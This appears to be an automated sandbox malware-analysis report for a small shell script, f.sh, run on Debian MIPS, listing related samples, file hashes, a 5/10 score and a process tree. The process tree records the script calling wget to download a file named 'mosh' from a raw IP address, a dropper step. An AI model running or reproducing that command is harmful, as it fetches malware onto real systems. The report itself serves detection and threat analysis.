Overview

overview

10

Static

static

10

.sshdd

ubuntu-18.04-amd64

7

261664

ubuntu-18.04-amd64

8

32

ubuntu-18.04-amd64

1

36000.exe

windows7-x64

7

36000.exe

windows10-2004-x64

7

64

ubuntu-18.04-amd64

8

GetPass.exe

windows7-x64

7

GetPass.exe

windows10-2004-x64

7

NetSyst81.dll

windows7-x64

1

NetSyst81.dll

windows10-2004-x64

1

POP

ubuntu-18.04-amd64

1

SAY123

ubuntu-18.04-amd64

5

SAY456

ubuntu-18.04-amd64

8

TomDog_Result.html

windows7-x64

1

TomDog_Result.html

windows10-2004-x64

1

a06

ubuntu-18.04-amd64

9

a07

ubuntu-18.04-amd64

9

a08

ubuntu-18.04-amd64

9

a09

ubuntu-18.04-amd64

9

a10

ubuntu-18.04-amd64

9

banner313.pl

ubuntu-18.04-amd64

banner313.pl

debian-9-armhf

banner313.pl

debian-9-mips

banner313.pl

debian-9-mipsel

f.sh

ubuntu-18.04-amd64

5

f.sh

debian-9-armhf

5

f.sh

debian-9-mips

5

f.sh

debian-9-mipsel

5

g3m.pl

ubuntu-18.04-amd64

g3m.pl

debian-9-armhf

g3m.pl

debian-9-mips

g3m.pl

debian-9-mipsel

Resubmissions

20-04-2023 08:22

230420-j9jsfaae7s 10

27-03-2023 09:38

230327-lmbvescg32 10

Analysis

  • max time kernel
    139s
  • max time network
    165s
  • platform
    linux_mips
  • resource
    debian9-mipsbe-en-20211208
  • resource tags

    arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    20-04-2023 08:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f.sh

  • Size

    518B

  • MD5

    cac62e5664152a357145747ba5dbe0a2

  • SHA1

    8402c68d0b57b04eb19f52c18fc57edbe716f0da

  • SHA256

    919bce738726efdfd08aa43552e095851c52c7452ef4c6c03d2b4c08cbceda76

  • SHA512

    6e19b9dbf0e3cff0397c6cdf1774bdd08070b509be2520c32a3148daa0211cf74a728f2e163199e789d5bbead4f9cd246853483e65526ddef1b14a62bdb6d52f

Score
5/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/f.sh
    /tmp/f.sh
    1⤵
    • Writes file to tmp directory
    PID:324
    • /usr/bin/wget
      wget http://93.174.93.45/mosh
      2⤵
        PID:325

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads